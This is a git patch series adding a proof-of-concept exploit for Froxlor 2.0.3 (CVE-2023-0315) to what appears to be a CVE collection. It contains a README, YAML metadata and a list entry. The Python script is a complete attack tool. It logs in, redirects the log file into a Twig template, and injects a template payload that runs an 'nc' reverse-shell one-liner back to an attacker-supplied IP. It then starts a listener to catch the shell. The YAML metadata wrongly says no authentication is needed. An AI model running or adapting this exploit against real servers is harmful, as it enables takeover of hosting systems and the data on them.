From a6c33b45d5fd8ceca989584035d7d2ab91ad95ad Mon Sep 17 00:00:00 2001 From: 2045 Date: Mon, 3 Apr 2023 13:20:26 +0800 Subject: [PATCH 1/2] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-0315?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2023/CVE-2023-0315/README.md | 28 ++++ .../2023/CVE-2023-0315/cve-2023-0315.py | 135 ++++++++++++++++++ cve/Froxlor/2023/yaml/CVE-2023-0315.yaml | 21 +++ openkylin_list.yaml | 2 + 4 files changed, 186 insertions(+) create mode 100644 cve/Froxlor/2023/CVE-2023-0315/README.md create mode 100644 cve/Froxlor/2023/CVE-2023-0315/cve-2023-0315.py create mode 100644 cve/Froxlor/2023/yaml/CVE-2023-0315.yaml diff --git a/cve/Froxlor/2023/CVE-2023-0315/README.md b/cve/Froxlor/2023/CVE-2023-0315/README.md new file mode 100644 index 00000000..d0fe71ba --- /dev/null +++ b/cve/Froxlor/2023/CVE-2023-0315/README.md @@ -0,0 +1,28 @@ +# CVE-2023-0315 Proof-of-Concept +### Overview +This is a Remote Code Execution Proof-of-Concept for Froxlor 2.0.3 Stable Vulnerability CVE-2023-0315. +It exploits a command injection vulnerability in Froxlor prior to version 2.0.8. +An authenticated attacker can achieve a full remote command execution on OS level under the web server user. +For a comprehensive understanding, check out the accompanying [blog post](https://huntr.dev/bounties/ff4e177b-ba48-4913-bbfa-ab8ce0db5943) for in-depth details. + +### Dependencies +* Froxlor 2.0.3 Stable +* Python 3.8+ +* `requests` Python Library +* `beautifulsoup4` Python Library +* Ubuntu 20.04 +* PHP 8.2 +### Usage + +1.Verify the required libraries are installed: +``` +pip install requests beautifulsoup4 +``` +2.Change the target URL, credentials, and any other required variables to match your vulnerable Froxlor instance. + +3.Run the PoC: +``` +python cve-2023-0315.py +``` +### Additional Information +This PoC targets Froxlor 2.0.3 Stable and has been tested on Ubuntu 20.04 with PHP 8.2. The vulnerability was patched in Froxlor version 2.0.8. To protect against this vulnerability, it is recommended to update Froxlor to the latest version. diff --git a/cve/Froxlor/2023/CVE-2023-0315/cve-2023-0315.py b/cve/Froxlor/2023/CVE-2023-0315/cve-2023-0315.py new file mode 100644 index 00000000..bb07041b --- /dev/null +++ b/cve/Froxlor/2023/CVE-2023-0315/cve-2023-0315.py @@ -0,0 +1,135 @@ +#!/usr/bin/python3 + +# Exploit Title: Froxlor 2.0.3 Stable - Remote Code Execution +# Date: 2023-01-08 +# Exploit Author: Askar (@mohammadaskar2) +# CVE: CVE-2023-0315 +# Vendor Homepage: https://froxlor.org/ +# Version: v2.0.3 +# Tested on: Ubuntu 20.04 / PHP 8.2 + +import telnetlib +import requests +import socket +import sys +import warnings +import random +import string +from bs4 import BeautifulSoup +from urllib.parse import quote +from threading import Thread + +warnings.filterwarnings("ignore", category=UserWarning, module='bs4') + + +if len(sys.argv) != 6: + print("[~] Usage : ./froxlor-rce.py url username password ip port") + exit() + +url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +ip = sys.argv[4] +port = sys.argv[5] + +request = requests.session() + +def login(): + login_info = { + "loginname": username, + "password": password, + "send": "send", + "dologin": "" + } + login_request = request.post(url+"/index.php", login_info, allow_redirects=False) + login_headers = login_request.headers + location_header = login_headers["Location"] + if location_header == "admin_index.php": + return True + else: + return False + + +def change_log_path(): + change_log_path_url = url + "/admin_settings.php?page=overview&part=logging" + csrf_token_req = request.get(change_log_path_url) + csrf_token_req_response = csrf_token_req.text + soup = BeautifulSoup(csrf_token_req_response, "lxml") + csrf_token = (soup.find("meta", {"name":"csrf-token"})["content"]) + print("[+] Main CSRF token retrieved %s" % csrf_token) + + multipart_data = { + + "logger_enabled": (None, "0"), + "logger_enabled": (None, "1"), + "logger_severity": (None, "2"), + "logger_logtypes[]": (None, "file"), + "logger_logfile": (None, "/var/www/html/froxlor/templates/Froxlor/footer.html.twig"), + "logger_log_cron": (None, "0"), + "csrf_token": (None, csrf_token), + "page": (None, "overview"), + "action": (None, ""), + "send": (None, "send") + + } + req = request.post(change_log_path_url, files=multipart_data) + response = req.text + if "The settings have been successfully saved." in response: + print("[+] Changed log file path!") + return True + else: + return False + + +def inject_template(): + admin_page_path = url + "/admin_index.php" + csrf_token_req = request.get(admin_page_path) + csrf_token_req_response = csrf_token_req.text + soup = BeautifulSoup(csrf_token_req_response, "lxml") + csrf_token = (soup.find("meta", {"name":"csrf-token"})["content"]) + onliner = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f".format(ip, port) + payload = "{{['%s']|filter('exec')}}" % onliner + data = { + "theme": payload, + "csrf_token": csrf_token, + "page": "change_theme", + "send": "send", + "dosave": "", + } + req = request.post(admin_page_path, data, allow_redirects=False) + try: + location_header = req.headers["Location"] + if location_header == "admin_index.php": + print("[+] Injected the payload sucessfully!") + except: + print("[-] Can't Inject payload :/") + exit() + handler_thread = Thread(target=connection_handler, args=(port,)) + handler_thread.start() + print("[+] Triggering the payload ...") + req2 = request.get(admin_page_path) + + +def connection_handler(port): + print("[+] Listener started on port %s" % port) + t = telnetlib.Telnet() + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", int(port))) + s.listen(1) + conn, addr = s.accept() + print("[+] Connection received from %s" % addr[0]) + t.sock = conn + print("[+] Heads up, incoming shell!!") + t.interact() + + + +if login(): + print("[+] Successfully Logged in!") + index_url = url + "/admin_index.php" + request.get(index_url) + if change_log_path(): + inject_template() + +else: + print("[-] Can't login") \ No newline at end of file diff --git a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml new file mode 100644 index 00000000..e6c84988 --- /dev/null +++ b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml @@ -0,0 +1,21 @@ +id: CVE-2023-0315 +source: + https://github.com/mhaskar/CVE-2023-0315 +info: + name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 + severity: high + description: | + Froxlor 2.0.8 之前的版本存在远程代码执行漏洞。攻击者可以在未经身份验证的情况下利用这个漏洞在OS级别执行任意代码。 + scope-of-influence: + Froxlor 2.0.8 之前的版本 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-0315 + - https://github.com/froxlor/froxlor/commit/090cfc26f2722ac3036cc7fd1861955bc36f065a + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-0315 + cwe-id: CWE-77 + cnvd-id: None + kve-id: None + tags: 远程代码执行,RCE diff --git a/openkylin_list.yaml b/openkylin_list.yaml index fe6ea472..f3d3f72d 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -155,6 +155,8 @@ cve: - CVE-2022-27925 Grafana: - CVE-2021-43798 + Froxlor: + - CVE-2023-0315 cnvd: apache-tomcat: - CNVD-2020-10487 -- Gitee From c20298ab4772dee41eb90b20cca21c8a89b36c96 Mon Sep 17 00:00:00 2001 From: 2045 Date: Mon, 3 Apr 2023 19:42:35 +0800 Subject: [PATCH 2/2] =?UTF-8?q?=E4=BF=AE=E6=AD=A3CVE-2023-0315.yaml?= =?UTF-8?q?=E4=B8=AD=E7=9A=84=E4=B8=80=E4=B8=AA=E6=A0=BC=E5=BC=8F=E9=97=AE?= =?UTF-8?q?=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2023/yaml/CVE-2023-0315.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml index e6c84988..5823536a 100644 --- a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml +++ b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml @@ -18,4 +18,4 @@ info: cwe-id: CWE-77 cnvd-id: None kve-id: None - tags: 远程代码执行,RCE + tags: 远程代码执行, RCE -- Gitee